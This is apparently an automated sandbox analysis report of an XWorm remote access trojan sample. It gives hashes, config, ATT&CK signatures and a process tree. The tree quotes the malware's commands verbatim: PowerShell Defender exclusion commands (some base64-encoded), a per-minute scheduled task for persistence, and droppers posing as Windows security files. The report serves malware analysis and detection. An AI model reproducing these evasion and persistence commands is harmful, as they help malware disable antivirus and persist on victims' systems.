Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/09/2024, 01:07

General

  • Target

    c9IDU7463.exe

  • Size

    971KB

  • MD5

    26efc684ddd0782b295a6ee4a76e3256

  • SHA1

    08cc73ef5c1b02e09765181a5acee1a7018dcffc

  • SHA256

    bf832f28b8d9f2ff077f691bd7e8a2cf46f3a4ac0ee8ee2d2f2944089abd20ab

  • SHA512

    20ba9e73514148613943db974cf88874907f9fe19e1cf5d81d9bf83ffbd233be80e925c62a5430a7ef69099e603ae54d60680020e0de58e632897f8c4aecfb49

  • SSDEEP

    24576:5tVd1nnqxDvo1QtHCX1LcsRt0ni/V27INjQL:5tVDnquatHCX1Lcs422kpQL

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:7000

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in System32 directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c9IDU7463.exe
    "C:\Users\Admin\AppData\Local\Temp\c9IDU7463.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2436
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Client Server Runtime Process.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2240
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client Server Runtime Process.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1828
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpD079.tmp.bat""
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:1224
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2132
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {A54C3C24-CC1C-4596-A0A6-9A2887C56A43} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Windows\System32\Client Server Runtime Process.exe
      "C:\Windows\System32\Client Server Runtime Process.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2108
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAeABoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAYgBqACMAPgA="
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2056
      • C:\Users\Admin\AppData\Local\Temp\Windows Security.exe
        "C:\Users\Admin\AppData\Local\Temp\Windows Security.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:752
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAZQBuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAdQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAegB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdQBuACMAPgA="
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3000
        • C:\Users\Admin\AppData\Local\Temp\Windows Security Notification.exe
          "C:\Users\Admin\AppData\Local\Temp\Windows Security Notification.exe"
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1544
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Windows Security Notification.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2352
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Notification.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2148
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\malware builder'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1596
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'malware builder'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1792
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "malware builder" /tr "C:\Users\Admin\AppData\Roaming\malware builder"
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2836

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Windows Security Notification.exe

    Filesize

    114KB

    MD5

    d59bcf447ab9a90d1c6e9701d85d5700

    SHA1

    c7eff0f1d56e71a601cff1e161879ea520886a32

    SHA256

    50738407f70e37470182a0da6b44e78eb9cd2be3f7c43e066ea85f92388c79ae

    SHA512

    4a33de1700a6740c354d79b6e2f706dbc924805b6c8aae03d68cf17427e52a58e65a177622266f4d4e9d0d0904d8ab7a55af2576d555bcc5868b9084730e7180

  • C:\Users\Admin\AppData\Local\Temp\Windows Security.exe

    Filesize

    164KB

    MD5

    9efb0ca4f150666bedbc6ef91e0e6f4b

    SHA1

    13b140227e709d3a534d4158111c9256b14474b3

    SHA256

    5ff4fc5985d8d9877dd5b4abe081ee91681b187e99a466b802a8795fd9e500ab

    SHA512

    7e16155776a1431eda8da3b2fe134b52863c0917170dc64ded710c5133705a0c019c930f696d5972a0a63270f59900cfca4b776631c0b5442c62696db4f7ca36

  • C:\Users\Admin\AppData\Local\Temp\tmpD079.tmp.bat

    Filesize

    161B

    MD5

    85b198e0ceb42e8889a3431ab462862b

    SHA1

    2e8fd589d5f90ec3c2f245ef110da367ea79f2bb

    SHA256

    a386e2faba834a3fcbc453b9a7b7052172bafe7d4cd896a7d5afc34c3ed54a21

    SHA512

    883a102def4f360e5ced0933783ed583898b212a6d33d6b5aaabbc66614304862a1da526bcf1b77a3bdb7f36e3c9611d2aa83fe4d15e1fce0c4207a5464095b8

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    4f0e7ccd703c3fcd69deb7430a7c1ad4

    SHA1

    546d29162a2049e0f303e49e868d87bbf28c966b

    SHA256

    07267bdd7040491adeba7359298e6d2f7705e9fb26e3e2efcac128232f071d99

    SHA512

    d2429c6a250fda52ead3db49b5a510b0d09387c9bcee2d57a8c83d7c2a3d05dbf21d890cf42d700b328f4c971f9b5a51d57d7be0691c041e186b80397accb129

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    c61513dd7527e37e9c087a0f88fe04d1

    SHA1

    75eb2a959cd1a856578d528c0ccca2000dc17d96

    SHA256

    a5db6933d1889f0918ce2cbda2d90fc59b4848f59752f24c6673ec75cb10fa60

    SHA512

    9bcab283524db58c9b6ded3d18e48fe2d1ef29477d944e34335fda580b336f1a73638e8d61d2aa4dfbf70444fa1feebb10ead0f33178ff939abe09a0ec9667c7

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    cb9d70b4fd0ab956e11225408571ddf0

    SHA1

    14e11e12a44378d612e185152a967ede6e9644c5

    SHA256

    3c98d1e70f6d4a487698324a5225295e790ccc636a694fba48406610023e287c

    SHA512

    ad775e101034601d1a26b3ed6f5a231409befced88adf51c5bc3fb34e6cf346f96d0953f012d69d7c7cb712cf4c48412be9254d9a389d806e6be9b63bd1a0d33

  • C:\Windows\System32\Client Server Runtime Process.exe

    Filesize

    971KB

    MD5

    26efc684ddd0782b295a6ee4a76e3256

    SHA1

    08cc73ef5c1b02e09765181a5acee1a7018dcffc

    SHA256

    bf832f28b8d9f2ff077f691bd7e8a2cf46f3a4ac0ee8ee2d2f2944089abd20ab

    SHA512

    20ba9e73514148613943db974cf88874907f9fe19e1cf5d81d9bf83ffbd233be80e925c62a5430a7ef69099e603ae54d60680020e0de58e632897f8c4aecfb49

  • memory/752-40-0x0000000000AF0000-0x0000000000B1E000-memory.dmp

    Filesize

    184KB

  • memory/1544-56-0x0000000000030000-0x0000000000052000-memory.dmp

    Filesize

    136KB

  • memory/1828-14-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

    Filesize

    2.9MB

  • memory/1828-15-0x0000000002890000-0x0000000002898000-memory.dmp

    Filesize

    32KB

  • memory/2108-32-0x0000000000220000-0x000000000031A000-memory.dmp

    Filesize

    1000KB

  • memory/2108-33-0x000000001AD70000-0x000000001AE38000-memory.dmp

    Filesize

    800KB

  • memory/2108-34-0x0000000000320000-0x000000000035C000-memory.dmp

    Filesize

    240KB

  • memory/2148-69-0x0000000001D20000-0x0000000001D28000-memory.dmp

    Filesize

    32KB

  • memory/2240-8-0x0000000001D60000-0x0000000001D68000-memory.dmp

    Filesize

    32KB

  • memory/2240-7-0x000000001B580000-0x000000001B862000-memory.dmp

    Filesize

    2.9MB

  • memory/2352-63-0x0000000002780000-0x0000000002788000-memory.dmp

    Filesize

    32KB

  • memory/2436-28-0x000007FEF5970000-0x000007FEF635C000-memory.dmp

    Filesize

    9.9MB

  • memory/2436-2-0x000007FEF5970000-0x000007FEF635C000-memory.dmp

    Filesize

    9.9MB

  • memory/2436-0-0x000007FEF5973000-0x000007FEF5974000-memory.dmp

    Filesize

    4KB

  • memory/2436-19-0x000007FEF5970000-0x000007FEF635C000-memory.dmp

    Filesize

    9.9MB

  • memory/2436-1-0x0000000000270000-0x000000000036A000-memory.dmp

    Filesize

    1000KB

  • memory/2436-18-0x000007FEF5973000-0x000007FEF5974000-memory.dmp

    Filesize

    4KB